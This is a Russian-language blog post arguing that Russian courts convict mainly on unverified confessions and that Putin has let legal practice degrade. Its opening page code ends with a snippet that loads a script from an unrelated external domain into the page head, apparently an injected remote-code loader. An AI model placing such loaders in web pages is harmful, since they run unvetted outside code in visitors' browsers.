, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Если все юристы в России уйдут в отставку?

21 Мар

Полагаю, что  народ и чиновники этого не заметят, и вот почему?

На заседании коллегии Генпрокуратуры России http://kremlin.ru/events/president/news/56863    генпрокурор Юрия Чайка отметил: «На фоне сокращения числа направленных в суд дел количество допущенных нарушений закона выросло и составило 5,2 миллиона.  И это при том, что почти 70 процентов уголовных дел рассматривают в судах в особом порядке, без исследования доказательств, а следователи и дознаватели по указанным делам, как известно, упрощают свою работу до предела.

При таких минимальных нагрузках и затраченных интеллектуальных ресурсах мы вправе требовать принципиально иного уровня законности».

Но участвовавший на заседании коллегии Путин,  не предпринял никаких мер  по противодействию сложившейся неправомерной правоприменительной практики, которая лишает судебную власть состязательного процесса, исследующего собранные по делу доказательства.

Странно осознавать, что юрист Путин так и не понял важности для управления страной правосудия, как вида государственной деятельности, осуществляемой в особом порядке, установленном Конституцией и процессуальным законодательством.

Беда еще и в том, что в его кадровом резерве нет настоящих правоведов, способных убедить в важности власти Конституции России, обеспеченной её гарантом и правосудием.

Про адвокатов-решалок очень убедительно всему миру поведал Дмитрий Медведев, столкнувшись с ними в здании Верховного Суда РФ. Но с тех пор это явление так и осталось неистребимым, несмотря на публикации СМИ об «особых» адвокатах-решалках.

Живучести этому явлению способствует то, что из 2 млн. уголовных дел, что ежегодно возбуждается в стране, до суда стало доходить не более 800−900 тысяч.

Достоверно зная о пыточном https://sobchakprotivvseh.ru/blog/41   судопроизводстве, вынуждающим назначенного обвиняемым брать на себя чужую вину, Путин подписал и обнародовал закон, позволяющий  осуждать на одних только признательных показаниях обвиняемых, без проверки собранных по делу доказательств.

Тем самым сделал невостребованным важнейший раздел в УПК РФ о доказывании и доказательствах. Раздел, который только и позволяет признавать сложившуюся в стране правоприменительную практику законной либо неправомерной.

Как юрист по образованию Путин не мог не знать, что признание обвиняемым своей вины в совершении преступления может быть положено в основу обвинения лишь при подтверждении его виновности совокупностью имеющихся по уголовному делу доказательств (ч. 2 ст. 77 УПК РФ).

Но подписанный http://rulaws.ru/laws/Federalnyy-zakon-ot-04.07.2003-N-92-FZ/         Путиным закон, позволяет не считаться с такой процедурой доказывания. Даже Сталин с Вышинским, считавшие  признание обвиняемым вины «царицей» доказательств, не пытались узаконить это.  Путин узаконил.

Несмотря на то, что  по Конституции России каждому гарантируется участие адвоката с момента задержания, это фактически никогда не исполняется с адвокатом по соглашению. Как правило, с задержанным работает адвокат по назначению, таких прозвали «карманные» адвокаты, а затем, нередко по решению суда, удаётся в дело вступить тому, кого доверитель сам пригласил.

Какую может «помощь» оказать адвокат по назначению, показывает https://www.rbc.ru/politics/02/02/2015/54cf75959a794765cff31142   дело многодетной матери Светланы Давыдовой, обвинённой в разглашении государственной тайны.

Ежегодно в стране осуждают 500−600 тыс. подсудимых на одних только их признательных показаниях, не проверяя и не исследуя собранные доказательства. О какой состязательности и каком судопроизводстве можно при такой процедуре говорить?

Такое судопроизводство ведётся 15лет. Оно привело к деградации адвокатской, правоохранительной деятельности, а также судебной. Фактически более 2 млн. юристов не могут обеспечивать жизнь страны по воле единственного источника власти в стране, многонационального народа, что изложена в Конституции России. Главенствует ничем не умеряемое самовластие. Но почти 70 млн. избирателей, что проголосовали за Путина, такая жизнь устраивает.  Ежедневно они видят, как жируют чиновники, похваляясь своими домами, квартирами, дачами, автомобилями, отдыхом за рубежом, но их радует  то, что юрист Путин  за шесть лет позволит не более 40 раз применить п. п. 8. п. 2 ст. 235 ГК РФ к вороватым чиновникам.

Что-то мне подсказывает, что это последние шесть лет бесправия в России. А Вам?

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.